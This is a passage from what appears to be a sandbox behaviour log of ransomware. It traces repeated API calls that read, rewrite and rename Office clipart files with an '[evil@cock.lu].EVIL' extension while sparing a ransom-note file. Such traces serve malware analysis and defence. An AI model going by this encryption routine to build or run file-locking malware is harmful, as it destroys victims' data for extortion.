lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1400, lpOverlapped=0x0) returned 1 [0121.125] CloseHandle (hObject=0x1a8) returned 1 [0121.125] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00438_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0121.125] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0121.125] __uncaught_exception () returned 0x84b1160800 [0121.125] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0121.125] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00438_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00438_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00438_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00438_.wmf.[evil@cock.lu].evil")) returned 1 [0121.126] ??_V@YAXPEAX@Z () returned 0x1 [0121.130] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00438_.WMF", dwFileAttributes=0x200) returned 0 [0121.130] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0121.130] wcsstr (_Str="FD00455_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0121.130] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00455_.WMF") returned 69 [0121.130] wcscmp (_String1="FD00455_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0121.130] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD00455_.WMF") returned 0x0 [0121.130] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00455_.WMF") returned 0x45 [0121.130] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00455_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00455_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0121.133] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x22de, lpOverlapped=0x0) returned 1 [0121.174] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0121.174] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0121.174] _errno () returned 0x84b1160840 [0121.174] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.174] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x22e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x22e0, lpOverlapped=0x0) returned 1 [0121.174] CloseHandle (hObject=0x1a8) returned 1 [0121.174] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00455_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0121.175] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0121.175] __uncaught_exception () returned 0x84b1160800 [0121.175] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0121.175] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00455_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00455_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00455_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00455_.wmf.[evil@cock.lu].evil")) returned 1 [0121.176] ??_V@YAXPEAX@Z () returned 0x1 [0121.179] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00455_.WMF", dwFileAttributes=0x200) returned 0 [0121.179] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0121.179] wcsstr (_Str="FD00459_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0121.179] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00459_.WMF") returned 69 [0121.180] wcscmp (_String1="FD00459_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0121.180] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD00459_.WMF") returned 0x0 [0121.180] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00459_.WMF") returned 0x45 [0121.180] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00459_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00459_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0121.182] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x43fe, lpOverlapped=0x0) returned 1 [0121.210] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0121.210] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0121.210] _errno () returned 0x84b1160840 [0121.210] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.210] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x4400, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4400, lpOverlapped=0x0) returned 1 [0121.210] CloseHandle (hObject=0x1a8) returned 1 [0121.211] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00459_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0121.211] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0121.211] __uncaught_exception () returned 0x84b1160800 [0121.211] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0121.211] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00459_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00459_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00459_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00459_.wmf.[evil@cock.lu].evil")) returned 1 [0121.212] ??_V@YAXPEAX@Z () returned 0x1 [0121.216] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00459_.WMF", dwFileAttributes=0x200) returned 0 [0121.216] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0121.216] wcsstr (_Str="FD00543_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0121.216] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00543_.WMF") returned 69 [0121.216] wcscmp (_String1="FD00543_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0121.216] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD00543_.WMF") returned 0x0 [0121.216] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00543_.WMF") returned 0x45 [0121.216] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00543_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00543_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0121.218] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5c0, lpOverlapped=0x0) returned 1 [0121.244] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0121.244] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0121.244] _errno () returned 0x84b1160840 [0121.244] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.244] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x5e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5e0, lpOverlapped=0x0) returned 1 [0121.245] CloseHandle (hObject=0x1a8) returned 1 [0121.245] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00543_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0121.245] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0121.245] __uncaught_exception () returned 0x84b1160800 [0121.245] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0121.245] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00543_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00543_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00543_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00543_.wmf.[evil@cock.lu].evil")) returned 1 [0121.246] ??_V@YAXPEAX@Z () returned 0x1 [0121.250] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00543_.WMF", dwFileAttributes=0x200) returned 0 [0121.250] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0121.250] wcsstr (_Str="FD00544_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0121.250] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00544_.WMF") returned 69 [0121.250] wcscmp (_String1="FD00544_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0121.250] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD00544_.WMF") returned 0x0 [0121.250] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00544_.WMF") returned 0x45 [0121.250] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00544_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00544_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0121.252] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x148c, lpOverlapped=0x0) returned 1 [0121.259] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0121.259] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0121.259] _errno () returned 0x84b1160840 [0121.259] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.260] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x14a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x14a0, lpOverlapped=0x0) returned 1 [0121.260] CloseHandle (hObject=0x1a8) returned 1 [0121.260] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00544_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0121.260] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0121.260] __uncaught_exception () returned 0x84b1160800 [0121.260] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0121.260] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00544_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00544_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00544_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00544_.wmf.[evil@cock.lu].evil")) returned 1 [0121.261] ??_V@YAXPEAX@Z () returned 0x1 [0121.264] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00544_.WMF", dwFileAttributes=0x200) returned 0 [0121.264] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0121.264] wcsstr (_Str="FD00564_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0121.264] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00564_.WMF") returned 69 [0121.264] wcscmp (_String1="FD00564_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0121.264] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD00564_.WMF") returned 0x0 [0121.264] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00564_.WMF") returned 0x45 [0121.264] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00564_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00564_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0121.266] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x380, lpOverlapped=0x0) returned 1 [0121.824] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0121.824] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0121.824] _errno () returned 0x84b1160840 [0121.824] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.824] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x3a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3a0, lpOverlapped=0x0) returned 1 [0121.824] CloseHandle (hObject=0x1a8) returned 1 [0121.825] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00564_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0121.825] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0121.825] __uncaught_exception () returned 0x84b1160800 [0121.825] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0121.825] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00564_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00564_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00564_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00564_.wmf.[evil@cock.lu].evil")) returned 1 [0121.826] ??_V@YAXPEAX@Z () returned 0x1 [0121.828] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00564_.WMF", dwFileAttributes=0x200) returned 0 [0121.829] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0121.829] wcsstr (_Str="FD00586_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0121.829] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00586_.WMF") returned 69 [0121.829] wcscmp (_String1="FD00586_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0121.829] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD00586_.WMF") returned 0x0 [0121.829] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00586_.WMF") returned 0x45 [0121.829] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00586_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00586_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0121.830] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2f0, lpOverlapped=0x0) returned 1 [0121.883] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0121.883] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0121.883] _errno () returned 0x84b1160840 [0121.883] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.883] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x300, lpOverlapped=0x0) returned 1 [0121.883] CloseHandle (hObject=0x1a8) returned 1 [0121.883] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00586_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0121.884] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0121.884] __uncaught_exception () returned 0x84b1160800 [0121.884] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0121.884] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00586_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00586_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00586_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00586_.wmf.[evil@cock.lu].evil")) returned 1 [0121.885] ??_V@YAXPEAX@Z () returned 0x1 [0121.888] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00586_.WMF", dwFileAttributes=0x200) returned 0 [0121.888] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0121.888] wcsstr (_Str="FD00775_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0121.889] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00775_.WMF") returned 69 [0121.889] wcscmp (_String1="FD00775_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0121.889] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD00775_.WMF") returned 0x0 [0121.889] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00775_.WMF") returned 0x45 [0121.889] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00775_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00775_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0121.891] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2b90, lpOverlapped=0x0) returned 1 [0121.924] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0121.924] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0121.924] _errno () returned 0x84b1160840 [0121.924] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.924] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x2ba0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2ba0, lpOverlapped=0x0) returned 1 [0121.924] CloseHandle (hObject=0x1a8) returned 1 [0121.924] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00775_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0121.925] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0121.925] __uncaught_exception () returned 0x84b1160800 [0121.925] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0121.925] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00775_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00775_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00775_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00775_.wmf.[evil@cock.lu].evil")) returned 1 [0121.926] ??_V@YAXPEAX@Z () returned 0x1 [0121.929] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00775_.WMF", dwFileAttributes=0x200) returned 0 [0121.929] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0121.929] wcsstr (_Str="FD00779_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0121.929] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00779_.WMF") returned 69 [0121.930] wcscmp (_String1="FD00779_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0121.930] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FD00779_.WMF") returned 0x0 [0121.930] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00779_.WMF") returned 0x45 [0121.930] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00779_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00779_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0121.932] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2332, lpOverlapped=0x0) returned 1 [0121.946] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0121.946] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0121.946] _errno () returned 0x84b1160840 [0121.946] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.946] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x2340, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2340, lpOverlapped=0x0) returned 1 [0121.946] CloseHandle (hObject=0x1a8) returned 1 [0121.946] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00779_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0121.946] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 